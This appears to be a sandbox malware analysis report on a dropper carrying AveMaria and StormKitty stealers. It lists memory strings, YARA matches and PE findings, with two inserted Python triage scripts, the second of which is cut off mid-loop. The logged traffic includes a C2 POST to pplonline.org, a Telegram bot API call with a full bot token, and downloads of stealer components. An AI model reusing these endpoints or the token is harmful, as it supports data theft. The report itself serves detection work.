Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: pplonline.org
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B91CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s, 4_2_00B91CF0
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning 
schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: unknown HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Creates a window with clipboard capturing capabilities
Source: C:\ProgramData\AMD Driver\taskshell.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\ProgramData\AMD Driver\taskshell.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

System Summary:

Detected VMProtect packer
Source: AnonFileApi.dll.8.dr Static PE information: .vmp0 and .vmp1 section names
.NET source code contains very large strings
Source: dll.exe.0.dr, Forms.cs Long String: Length: 14336
Source: 5.2.dll.exe.10000.0.unpack, Forms.cs Long String: Length: 14336
Source: 5.0.dll.exe.10000.0.unpack, Forms.cs Long String: Length: 14336
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Detected potential crypto function
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096D4C4 0_2_0096D4C4
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096E5BE 0_2_0096E5BE
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096CDCC 0_2_0096CDCC
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_00961D11 0_2_00961D11
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_00007FFC08955E77 0_2_00007FFC08955E77
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83C90 4_2_00B83C90
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83480 4_2_00B83480
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83060 4_2_00B83060
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83AA0 4_2_00B83AA0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B74B10 4_2_00B74B10
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00408C60 6_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040DC11 6_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00407C3F 6_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00418CCC 6_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00406CA0 6_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004028B0 6_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0041A4BE 6_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00418244 6_2_00418244
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00401650 6_2_00401650
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00402F20 6_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004193C4 6_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00418788 6_2_00418788
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00402F89 6_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00402B90 6_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004073A0 6_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F04DA 6_2_021F04DA
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F0D00 6_2_021F0D00
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F6389 6_2_021F6389
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021FA19A 6_2_021FA19A
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F11B0 6_2_021F11B0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021FA1A8 6_2_021FA1A8
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F11A0 6_2_021F11A0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F0CF2 6_2_021F0CF2
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6E040 7_2_00E6E040
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6E030 7_2_00E6E030
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6B7AC 7_2_00E6B7AC
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D5ED9 8_2_00007FFC089D5ED9
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D0819 8_2_00007FFC089D0819
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EE040 12_2_017EE040
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EE030 12_2_017EE030
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EB7AC 12_2_017EB7AC
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_0567D318 12_2_0567D318
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_05674C30 12_2_05674C30
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_05676EDB 12_2_05676EDB
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246E010 16_2_0246E010
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246E020 16_2_0246E020
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246B78C 16_2_0246B78C
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056FD318 16_2_056FD318
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056F4C30 16_2_056F4C30
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056F6EDB 16_2_056F6EDB
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056F4BD9 16_2_056F4BD9
PE file contains strange resources
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: chormuim.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
PE file contains more sections than normal
Source: sqlite3.dll.4.dr Static PE information: Number of sections : 19 > 10
Uses 32bit PE files
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
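The static findings above (VMProtect .vmp0/.vmp1 section names, a section count of 19 where 10 is the report's "normal" ceiling, and the COFF characteristics flags on the 32-bit sample) all come from the PE COFF header and section table, which can be read without any PE library. The Python below is an added example, not part of the report and not code from any of the detected families: it parses the COFF header and section table with struct, decodes the characteristics bits, and reproduces the three checks. The two PE images it scans are constructed in memory by build_pe (headers only, modelled on the findings above, not the actual files); the UPX section names, the zero-raw-size heuristic and the finding names are assumptions of this example that go beyond what the report states.

```python
import struct

# IMAGE_FILE_* characteristics bits from the PE/COFF specification.
IMAGE_FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}

# Section names that identify a packer. The report confirms .vmp0/.vmp1 for
# VMProtect; the UPX names are added here as a well-known second case.
PACKER_SECTION_NAMES = {".vmp0": "VMProtect", ".vmp1": "VMProtect", ".vmp2": "VMProtect",
                        "UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX"}

def parse_pe(data: bytes) -> dict:
    """Read the COFF header and section table; enough for static triage."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, _ts, _symptr, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(nsect):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, _vaddr, rawsize, _rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": name, "vsize": vsize, "rawsize": rawsize})
    return {"machine": machine, "characteristics": chars, "sections": sections}

def decode_characteristics(value: int) -> list:
    """Flag names set in the COFF Characteristics field, in bit order."""
    return [name for bit, name in sorted(IMAGE_FILE_CHARACTERISTICS.items()) if value & bit]

def triage_pe(info: dict) -> list:
    findings = []
    names = [s["name"] for s in info["sections"]]
    for packer in sorted({PACKER_SECTION_NAMES[n] for n in names if n in PACKER_SECTION_NAMES}):
        findings.append(f"packer_section_names:{packer}")
    if len(names) > 10:                   # the report's "more sections than normal" threshold
        findings.append(f"section_count:{len(names)}>10")
    if "32BIT_MACHINE" in decode_characteristics(info["characteristics"]):
        findings.append("pe32")
    for s in info["sections"]:            # no bytes on disk but space in memory: filled at runtime
        if s["rawsize"] == 0 and s["vsize"] > 0:
            findings.append(f"zero_raw_size_section:{s['name']}")
    return findings

def build_pe(sections, characteristics, machine=0x014C) -> bytes:
    """Constructed minimal PE (headers only) for offline testing; not a real binary."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew
    opt = bytes(224)                                  # PE32 optional header size; contents unused here
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, len(opt), characteristics)
    table = b"".join(
        name.encode().ljust(8, b"\0")
        + struct.pack("<IIIIIIHHI", vsize, 0x1000, rawsize, 0x400, 0, 0, 0, 0, 0x60000020)
        for name, vsize, rawsize in sections)
    return bytes(dos) + b"PE\0\0" + coff + opt + table

# Constructed samples modelled on the findings above (not the actual files).
VMPROTECTED_EXE = build_pe(
    [(".text", 0x8000, 0x8000), (".rdata", 0x2000, 0x2000), (".data", 0x1000, 0x200),
     (".vmp0", 0x40000, 0), (".vmp1", 0x90000, 0x90000), (".reloc", 0x400, 0x400)],
    characteristics=0x0002 | 0x0004 | 0x0008 | 0x0100)   # EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | 32BIT_MACHINE
MANY_SECTION_DLL = build_pe(
    [(f".s{i:02d}", 0x1000, 0x1000) for i in range(19)],
    characteristics=0x0002 | 0x0020 | 0x2000, machine=0x8664)   # x64 DLL

if __name__ == "__main__":
    for label, blob in (("vmprotected", VMPROTECTED_EXE), ("many-sections", MANY_SECTION_DLL)):
        info = parse_pe(blob)
        print(label, decode_characteristics(info["characteristics"]), triage_pe(info))
```

Run against real files with `parse_pe(open(path, "rb").read())`; the parser reads only the headers, so a truncated or packed body does not matter. A section with SizeOfRawData 0 and a non-zero VirtualSize is worth reporting separately from the packer name: it is the space the unpacking stub fills at runtime, and it is what a memory dump of the process will contain.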
Yara signature match
Two rules matched. Their metadata is identical on every hit and is listed once here:
Rule SUSP_NET_NAME_ConfuserEx: author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Rule HKTL_NET_GUID_StormKitty: date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Every source below matched both rules:
Source: 8.2.chormuim.exe.280000.0.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.37fd950.7.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.280000.6.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.36cb892.6.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4bb6362.12.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.37fd950.7.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.730000.7.unpack, type: UNPACKEDPE
Source: 8.2.chormuim.exe.730000.1.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.280000.3.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.280000.0.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4b05400.8.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.730000.4.raw.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.730000.7.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE
Source: 8.2.chormuim.exe.730000.1.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.280000.2.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.23ad390.2.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.730000.4.unpack, type: UNPACKEDPE
Source: 8.0.chormuim.exe.280000.1.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE
Source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE
Source: 00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp, type: MEMORY
Source: 00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp, type: MEMORY
Source: 00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp, type: MEMORY
Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY
Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, type: DROPPED Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, type: DROPPED Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: String function: 00B78C20 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: String function: 00B92F70 appears 391 times
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: String function: 0040E1D8 appears 44 times
Sample file is different than original file name gathered from version info
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilename vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301495606.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameall.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301246051.0000000000E1B000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilenameall.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
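The signature above fires because the VERSIONINFO resource names the binary Dropper.exe, chormuimii.exe and all.exe while the file on disk is called 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe. The following Python is an added example of that check, not the sandbox's own implementation: it pulls every OriginalFilename value out of a PE image or memory dump by scanning for the UTF-16LE key (rather than walking the resource directory, so it also works on the raw .sdmp memory regions the report quotes) and compares them with the on-disk name. The SAMPLE bytes are constructed to mimic a StringFileInfo layout carrying the two names quoted in the report; they are not the real file.

```python
"""OriginalFilename vs. on-disk name check (added example, not Joe Sandbox code)."""
import re

# "OriginalFilename" as it is stored in VS_VERSIONINFO: UTF-16LE plus NUL terminator.
_KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def _read_utf16z(blob, pos):
    """Read a NUL-terminated UTF-16LE string starting at byte offset pos."""
    words = []
    while pos + 2 <= len(blob) and blob[pos:pos + 2] != b"\x00\x00":
        words.append(blob[pos:pos + 2])
        pos += 2
    return b"".join(words).decode("utf-16-le", "replace")


def original_filenames(blob):
    """Every OriginalFilename value found in blob, in order of appearance."""
    names = []
    for m in re.finditer(re.escape(_KEY), blob):
        pos = m.end()
        # A String entry pads the key to a DWORD boundary with at most one
        # zero WORD before the value begins; skip it if present.
        if blob[pos:pos + 2] == b"\x00\x00":
            pos += 2
        value = _read_utf16z(blob, pos)
        if value:
            names.append(value)
    return names


def name_mismatches(blob, on_disk_name):
    """OriginalFilename values that disagree (case-insensitively) with the on-disk name."""
    disk = on_disk_name.lower()
    return [n for n in original_filenames(blob) if n.lower() != disk]


def _entry(key, value):
    """Constructed StringFileInfo-style entry: key NUL value NUL, all UTF-16LE."""
    return (key.encode("utf-16-le") + b"\x00\x00"
            + value.encode("utf-16-le") + b"\x00\x00")


# Constructed stand-in for a dropper that carries its own version info plus that
# of an embedded payload; the two names are the ones the report quotes.
SAMPLE = (b"MZ" + b"\x90" * 30
          + _entry("CompanyName", "") + _entry("OriginalFilename", "Dropper.exe")
          + b"\xcc" * 17
          + _entry("OriginalFilename", "chormuimii.exe"))

if __name__ == "__main__":
    disk_name = "18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe"
    for n in name_mismatches(SAMPLE, disk_name):
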